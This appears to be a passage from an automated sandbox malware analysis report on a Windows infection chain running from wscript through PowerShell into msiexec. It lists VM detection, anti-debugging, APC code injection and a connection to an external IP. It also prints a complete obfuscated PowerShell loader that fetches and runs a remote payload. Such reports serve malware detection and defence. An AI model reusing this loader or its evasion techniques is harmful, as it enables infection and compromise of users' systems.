                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 5B8B83A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5065Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4823Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8440Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1238Jump to behavior
                        Source: C:\Windows\System32\wscript.exe TID: 6416Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2500Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: wscript.exe, 00000000.00000003.1773192384.000001CE97F43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1774374835.000001CE97F70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773788156.000001CE97F51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741652492.000001CE97F51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741505742.000001CE97F29000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773836255.000001CE97F69000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1772993678.000001CE97F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                        Source: msiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                        Source: powershell.exe, 00000003.00000002.1987068486.0000016E7F670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWar%SystemRoot%\system32\mswsock.dllgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y
                        Source: msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: wscript.exe, 00000000.00000003.1741711461.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1773359836.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742554516.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1740851349.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1743221651.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1774672446.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1742983945.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1741541718.000001CE99DDF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2203269463.0000000000617000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 00000000.00000002.1774255669.000001CE97F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\udiara
                        Source: msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Hides threads from debuggers
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04D69488 LdrInitializeThunk,LdrInitializeThunk,8_2_04D69488
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_032C0283 mov eax, dword ptr fs:[00000030h]11_3_032C0283

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Early bird code injection technique detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023Jump to behavior
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_5752.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4948, type: MEMORYSTR
                        Queues an APC in another process (thread injection)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 41A0000Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 